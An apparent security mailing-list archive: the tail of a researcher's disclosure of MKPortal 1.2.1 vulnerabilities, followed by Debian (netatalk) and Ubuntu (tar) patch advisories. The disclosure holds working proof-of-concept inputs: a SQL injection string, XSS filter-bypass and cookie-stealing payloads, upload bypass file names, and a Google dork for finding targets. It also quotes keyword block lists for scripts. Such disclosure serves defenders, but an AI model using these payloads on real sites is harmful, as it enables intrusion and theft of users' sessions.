$size = @getimagesize($tmpfilename);
//If getimagesize does not recognize file as an image delete file
if (!$size)  {
@unlink($tmpfilename);
$message .= "{$mklib->lang['error_filetype']}";
$mklib->error_page($message);
exit;
}
--------------------[/source code]---------------------

As this image file is perfectly normal jpg picture, then it will bypass
"getimagesize()" successfully. And "chmod()" will not make any differents in
specific situation.

Next:

---------------------[source code]---------------------
$file_type = $size['mime'];

if (!$mklib->check_attach($file_type, $file_ext))  {
//Delete invalid file and display error
@unlink($tmpfilename);
$message .= "{$mklib->lang['b_gnotsup']}";
$mklib->error_page($message);
exit;
}

//Validate by file contents
$fcontents = file_get_contents ($tmpfilename);
$carray = array("html", "javascript", "vbscript", "alert",
 "onmouseover", "onclick", "onload", "onsubmit");
foreach ($carray as $fch) {
             if (strstr($fcontents, $fch)) {
                 @unlink($tmpfilename);
$message .= "{$mklib->lang['error_filetype']}";
$mklib->error_page($message);
                 exit;
             }
         }
         if (preg_match("#script(.+?)/script#ies", $fcontents)) {
            @unlink($tmpfilename);
$message .= "{$mklib->lang['error_filetype']}";
$mklib->error_page($message);
             exit;
}
--------------------[/source code]---------------------

Again, MIME-type will be correct and html-code detection can't stop
malicious php code inside of that jpg file. 

Finally:

---------------------[source code]---------------------
$image = $totr.$file_name;

//move file from "tmp" directory to "images" directory
@rename($tmpfilename, "mkportal/blog/images/$image");
--------------------[/source code]---------------------

What's the possibilities? Attacker can upload picture file with php code
inside with filename like "pic.php.pjpg" and it will be stored in remote
server as result. And when attacker issues direct request to uploaded
picture:

http://localhost/mkportal.1.2.1/mkportal/blog/images/1pic.php.pjpg"

.. then in case of Apache webserver php code inside of picture will
be executed. Therefore it's basically remote php code execution.


2. Insecure file upload in Downloads module
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: critical
Preconditions:
 1. attacker must be registered user

Registered users can add new files in downloads module by default:

http://localhost/mkportal.1.2.1/index.php?ind=downloads&op=submit_file

Let's look at "mkportal/modules/Downloads/index.php" line ~662:

---------[source code]--------------------------
function add_file() {

     global $mkportals, $DB,  $_FILES, $mklib, $mklib_board;
..
//Replace illegal sub-extensions
$com_types = array('com', 'exe', 'bat', 'scr', 'pif', 'asp',
 'cgi', 'pl', 'php');
foreach ($com_types AS $bad) {
$file_name = str_replace(".$bad", "_$bad", $file_name);
---------[/source code]--------------------------

At first look this seems to be good security measure. If we try to upload
trojanized file with php code inside named "test.php.zzz', then it will be
transformed to "test_php.zzz" and php code execution is not possible.
But wait a minute ... "str_replace()" is case sensitive, right? So, what if
we try to upload "test.Php.zzz"? Yes, code fragment above will not trigger and
we end up with potentially dangerous uploaded file on remote server. It's easy
to find out URL to that file. First, let's look at file's download link:

http://localhost/mkportal.1.2.1/index.php?ind=downloads&op=download_file&ide=3
&file=test.Php.zzz

Here we can determine, that "ide=3". And this is the direct file request URL:

http://localhost/mkportal.1.2.1/mkportal/modules/downloads/file/mk_3_test.Php.mk

And it appears, that Apache does not care, if it's "php" or "Php" or "PHP", it
will parse the file as php script anyway. And as result any registered user with
file adding rights in downloads block can have arbitrary php code execution
possibilities in remote server.


3. Race condition in multiple modules file upload functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. multiple tries needed for successful exploitation

Affected modules are Blog (gallery file upload), Reviews and Image Gallery.
For example let's look at Image Gallery's file upload code:

---------[source code]--------------------------
if (!$FILE_UPLOAD && $FILE_URL) {
//Copy file from remote server to gallery "tmp" directory
if (!copy("$file", "mkportal/modules/gallery/album/tmp/$file_name")) {
$message = "{$mklib->lang['ga_errorupl']}";
$mklib->error_page($message);
exit;
}
} else {
//Move file from local server tmp directory to gallery "tmp" 
directory
if (!move_uploaded_file("$file", "mkportal/modules/gallery/album/
tmp/$file_name")) {
$message = "{$mklib->lang['ga_errorupl']}";
$mklib->error_page($message);
exit;
}
}
@chmod("mkportal/modules/gallery/album/tmp/$file_name", 0644);
..
//Validate by mime type
$tmpfilename = "mkportal/modules/gallery/album/tmp/$file_name";
$size = @getimagesize($tmpfilename);
//If getimagesize does not recognize file as an image delete file
if (!$size)  {
@unlink($tmpfilename);
$message .= "{$mklib->lang['ga_notsup']}";
$mklib->error_page($message);
exit;
}
---------[/source code]--------------------------

So there exists timeframe, where temporary file is allready  moved to "tmp"
directory, but it is not yet deleted. If attacker manages to issue request
like this

http://localhost/mkportal.1.2.1/mkportal/modules/Gallery/album/
tmp/pic.php.pjpg

.. in right time, then remote php code execution may be possible.
It is classical race condition and success probability of single try is
very limited, but it's possible to make thousands of tries, until hitting
the jackpot. And by the way, "chmod(0644)" does not matter in specific case :)


4. Sql Injection in Blog module template editing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have blog editing privileges
 3. magic_quotes_gpc=off (rare in real-world servers)

Let's look at source code of "modules/blog/index.php" line ~1441:

---------------------[source code]---------------------
function save_template () {
global $mkportals, $DB, $Skin, $mklib;
..
$idb = $mkportals->member['id'];
$template = $_POST['template'];
$template = $this->clean_template($template);
$template2 = $_POST['template2'];
$template2 = $this->clean_template($template2);

$DB->query("UPDATE mkp_blog SET template = '$template',
 template2 = '$template2' WHERE id = '$idb'");
--------------------[/source code]---------------------

No "addslashes()" or "mysql_real_escape_string()" is used, so sql injection
is possible, if "magic_quotes_gpc" setting is "off".

Proof of concept:

a) Go to blog template editing interface:

http://localhost/mkportal.1.2.1/index.php?ind=blog&opit_template

b) Insert text into the "Home Template" textarea:

',template=@@version,template2='

.. and hit "Update Template". As result MysSql version is shown instead
of blog content.



5. Reflected XSS in "handler_image.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions: none

Example:

http://localhost/mkportal.1.2.1/mkportal/modules/rss/handler_image.php
?i=<script>alert(123);</script>


6. Stored XSS in blog templates
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have blog editing privileges

MKportal offers blog functionality to all registered users. Blog access and
creation is enabled by default. Quick search in Google reveals, that many
websites have enabled blog module.

Google dork: inurl:"index.php?ind=blog"

Any registered user with blog editing privileges can modify his own
blog templates. Templates are stored in database. Blog owner can manipulate
templates html source in arbitrary ways, but some security filtering is
in place, in order to prevent inserting potentially malicious content
(Javascript, VBScript, ...) into blog templates.

Let's look at source code of "modules/blog/index.php" line ~1441:

---------------------[source code]---------------------
function save_template () {
global $mkportals, $DB, $Skin, $mklib;
..
$idb = $mkportals->member['id'];
$template = $_POST['template'];
$template = $this->clean_template($template);
$template2 = $_POST['template2'];
$template2 = $this->clean_template($template2);

$DB->query("UPDATE mkp_blog SET template = '$template',
 template2 = '$template2' WHERE id = '$idb'");
--------------------[/source code]---------------------

So we can see, that security filtering is handled by function
"clean_template()". Let's look inside of this function:

---------------------[source code]---------------------
function clean_template ($t="") {
..
        while( preg_match( "#script(.+?)/script#ies", $t ) ) {
                $t = preg_replace( "#script(.+?)/script#ies", "" , $t);
        }
        $t = preg_replace( "/javascript/i", "", $t );
        //$t = preg_replace( "/about/i" , "", $t );
        $t = preg_replace( "/vbscript/i" , "", $t );
        $t = preg_replace( "/alert/i" , "", $t );
        $t = preg_replace( "/onmouseover/i", "", $t );
        $t = preg_replace( "/onclick/i" , "", $t );
        $t = preg_replace( "/onload/i" , "", $t );
        $t = preg_replace( "/onsubmit/i" , "", $t );

..
$t = preg_replace( "/ecmascript/i" , "", $t );
  $t = preg_replace( "/about:/si" , "", $t );
$t = preg_replace( "/data:/si" , "", $t );
$t = preg_replace( "/onfocus/i" , "", $t );
$t = preg_replace( "/onblur/i" , "", $t );
$t = preg_replace( "/ondblclick/i" , "", $t );
$t = preg_replace( "/onmousedown/i" , "", $t );
$t = preg_replace( "/onmouseup/i" , "", $t );
$t = preg_replace( "/onmousemove/i" , "", $t );
$t = preg_replace( "/onmouseout/i" , "", $t );
$t = preg_replace( "/onkeypress/i" , "", $t );
$t = preg_replace( "/onkeydown/i" , "", $t );
$t = preg_replace( "/onkeyup/i" , "", $t );
$t = preg_replace( "/onunload/i" , "", $t );
      $t = preg_replace( "/onabort/i" , "", $t );
      $t = preg_replace( "/onerror/i" , "", $t );
$t = preg_replace( "/onchange/i" , "", $t );
$t = preg_replace( "/onreset/i" , "", $t );
$t = preg_replace( "/onselect/i" , "", $t );
$t = preg_replace( "/document\./i" , "", $t );
$t = preg_replace( "/window\./i" , "", $t );

..
        return $t;
    }

--------------------[/source code]---------------------

This kind of filtering is example of flawed-by-design implementation.
If someone wants insert javascript into blog template, then it's still
possible! Here are some working examples:

<body ononsubmitload=aleonsubmitrt(123);>

<salertcript>aalertlert(123);</salertcript>


7. Stored XSS in Reviews module comments functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have Reviews comments editing privileges

There are some security measures against script injection in comments
text, but still it's possible to sneak through those filters. Example:

<marquee loop=1 onfinish=alert(document.cookie) width=0></marquee>

This script will be executed, when someone opens review with this comment.
As result, cookie theft and other attacks may be possible. 


8. Stored XSS in News module comments functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: medium
Preconditions:
 1. attacker must be registered user
 2. attacker must have news comments editing privileges

Same story, as in previous case - filtering exists, but can be bypassed.



9. Full path disclosure in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security risk: low
Preconditions: display_errors = Off

Example:

http://localhost/mkportal.1.2.1/?ind[]

Result:

Warning: Illegal offset type in isset or empty in 
C:\apache_wwwroot\mkportal.1.2.1\index.php on line 102


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who know me! 


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
---------------------------------- [ EOF ] ---------------------------------

From - Thu Jan 15 16:42:48 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005a02
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39199-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 315DBED930
for <lists@securityspace.com>; Thu, 15 Jan 2009 16:38:18 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 4DEED236FCC; Thu, 15 Jan 2009 14:21:26 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 2813 invoked from network); 15 Jan 2009 20:37:08 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <jmm@inutil.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client.151.30.8> <helo=inutil.org> <from=jmm@inutil.org> <tobian-security-announce@lists.debian.org>, rate: -6.1
Date: Thu, 15 Jan 2009 22:00:47 +0100
From: Nico Golde <nion@debian.org>
Sender: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20090115210047.GA8901@galadriel.inutil.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
X-SA-Exim-Connect-IP: 82.83.213.194
X-SA-Exim-Mail-From: jmm@inutil.org
X-SA-Exim-Scanned: No (on inutil.org); SAEximRunCond expanded to false
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-10.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1705-1] New netatalk packages fix arbitrary code execution
Priority: urgent
Resent-Message-ID: <6O97xFSBJRI.A.SLC.SQ6bJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Thu, 15 Jan 2009 21:01:06 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1705-1                    security@debian.org
http://www.debian.org/security/                                 Nico Golde
January 15th, 2009                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : netatalk
Vulnerability  : missing input sanitising
Problem type   : local(remote)
Debian-specific: no
CVE ID         : CVE-2008-5718
Debian Bug     : 510585

It was discovered that netatalk, an implementation of the AppleTalk
suite, is affected by a command injection vulnerability when processing
PostScript streams via papd.  This could lead to the execution of
arbitrary code.  Please note that this only affects installations that are
configured to use a pipe command in combination with wildcard symbols
substituted with values of the printed job.

For the stable distribution (etch) this problem has been fixed in
version 2.0.3-4+etch1.

For the upcoming stable distribution (lenny) this problem has been fixed
in version 2.0.3-11+lenny1.

For the unstable distribution (sid) this problem has been fixed in
version 2.0.4~beta2-1.

We recommend that you upgrade your netatalk package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1.diff.gz
    Size/MD5 checksum:    27582 efc06139ef2adba4ca71c4ff9effefd2
  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3.orig.tar.gz
    Size/MD5 checksum:  1920570 17917abd7d255d231cc0c6188ccd27fb
  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1.dsc
    Size/MD5 checksum:      822 eb3fc44340caed42978dea8b8e8cc53d

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_alpha.deb
    Size/MD5 checksum:   869526 2a7d4250ee8380227231cd68cc70b5e4

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_amd64.deb
    Size/MD5 checksum:   751530 67f12f90fa7e11d8dfa791f36ee05e22

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_arm.deb
    Size/MD5 checksum:   729204 14b32580e4d93588404c1669074f9f09

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_hppa.deb
    Size/MD5 checksum:   800306 26eb091564c8077955d41ac42b585868

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_i386.deb
    Size/MD5 checksum:   706600 542cfc6b12f76ed4a068a389fa059372

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_ia64.deb
    Size/MD5 checksum:  1007572 a5393f96b01e65c8daece94babe663c2

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_mips.deb
    Size/MD5 checksum:   776996 5d25c6809bfd2c3a6d3b29be1bd5e5e4

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_mipsel.deb
    Size/MD5 checksum:   773318 c6393e566664dbd1959e7c154ae90e37

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_powerpc.deb
    Size/MD5 checksum:   757606 ba364451858fc30ce3a4e2996ab316b0

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_s390.deb
    Size/MD5 checksum:   770290 7970c3e8038bd51b6089cf824af789d6

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/n/netatalk/netatalk_2.0.3-4+etch1_sparc.deb
    Size/MD5 checksum:   711964 fe24e2794125763c9548f522fd152a88


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAklvo3wACgkQXm3vHE4uylrXCwCgsIdRo/L8Sf2ObeKwzj8Feuix
d+EAn1s6asea2Ygbs5BJjptm9xC+56wn
=uODl
-----END PGP SIGNATURE-----

From - Thu Jan 15 17:12:48 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00005a07
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39201-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 98CA8ED891
for <lists@securityspace.com>; Thu, 15 Jan 2009 17:09:55 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 872E9143775; Thu, 15 Jan 2009 15:05:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4975 invoked from network); 15 Jan 2009 21:31:57 -0000
Date: Thu, 15 Jan 2009 15:55:53 -0600
From: Jamie Strandboge <jamie@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-709-1] tar vulnerability
Message-ID: <20090115215553.GE4202@severus.strandboge.com>
Reply-To: Jamie Strandboge <jamie@canonical.com>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="uCPdOCrL+PnN2Vxy"
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
Status:   


--uCPdOCrL+PnN2Vxy
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

==========================================================Ubuntu Security Notice USN-709-1           January 15, 2009
tar vulnerability
CVE-2007-4476
==========================================================
A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  tar                             1.15.1-2ubuntu2.3

Ubuntu 7.10:
  tar                             1.18-2ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Dmitry V. Levin discovered a buffer overflow in tar. If a user or automated
system were tricked into opening a specially crafted tar file, an attacker
could crash tar or possibly execute arbitrary code with the privileges of the
user invoking the program.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3.diff.gz
      Size/MD5:    31101 bd2a94f0578416e4ad7ed5d8e0eaab15
    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3.dsc
      Size/MD5:      582 6395ad2276cbfb04535c8e9a760184c2
    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1.orig.tar.gz
      Size/MD5:  2204322 d87021366fe6488e9dc398fcdcb6ed7d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3_amd64.deb
      Size/MD5:   532580 8bf4846b9b2108f42886784c794c01f6

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3_i386.deb
      Size/MD5:   519940 3ddc9cb9cf77bf95d711eef4b3f7851c

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3_powerpc.deb
      Size/MD5:   534426 0385fa88092124b117af7cd37bc2c588

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.3_sparc.deb
      Size/MD5:   524246 8b1ad8790f52ca7282a76a96b6b134cc

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1.diff.gz
      Size/MD5:    47111 588df897391765ca5523e6ab611ed32b
    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1.dsc
      Size/MD5:      679 bc6cbaab0f63ef2289c49344ed88d6df
    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18.orig.tar.gz
      Size/MD5:  2381295 c5fc59099be4419d18f59fe8a7946017

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1_amd64.deb
      Size/MD5:   384512 b9f347f8bb3f1209a2f2ba6b69a06eb6

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1_i386.deb
      Size/MD5:   339818 611afdfeb25440e65e3d722947408f5c

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/t/tar/tar_1.18-2ubuntu1.1_lpia.deb
      Size/MD5:   339942 1c900b255c7fb9d2f8f7b69a0d737d26

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1_powerpc.deb
      Size/MD5:   359094 b790c9aa4e73dab09ca6892456970b71

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.18-2ubuntu1.1_sparc.deb
      Size/MD5:   342586 02aa39721b80469a26062f4c86e93b08


New User Registration
Email:
UserID:
Passwd:
Please email me your monthly newsletters, informing the latest services, improvements & surveys.
Please email me a vulnerability test announcement whenever a new test is added.
   Privacy
Registered User Login
 
UserID:   
Passwd:  

 Forgot userid or passwd?
Email/Userid:




Home | About Us | Contact Us | Partner Programs | Privacy | Mailing Lists | Abuse
Security Audits | Managed DNS | Network Monitoring | Site Analyzer | Internet Research Reports
Web Probe | Whois

© 1998-2014 E-Soft Inc. All rights reserved.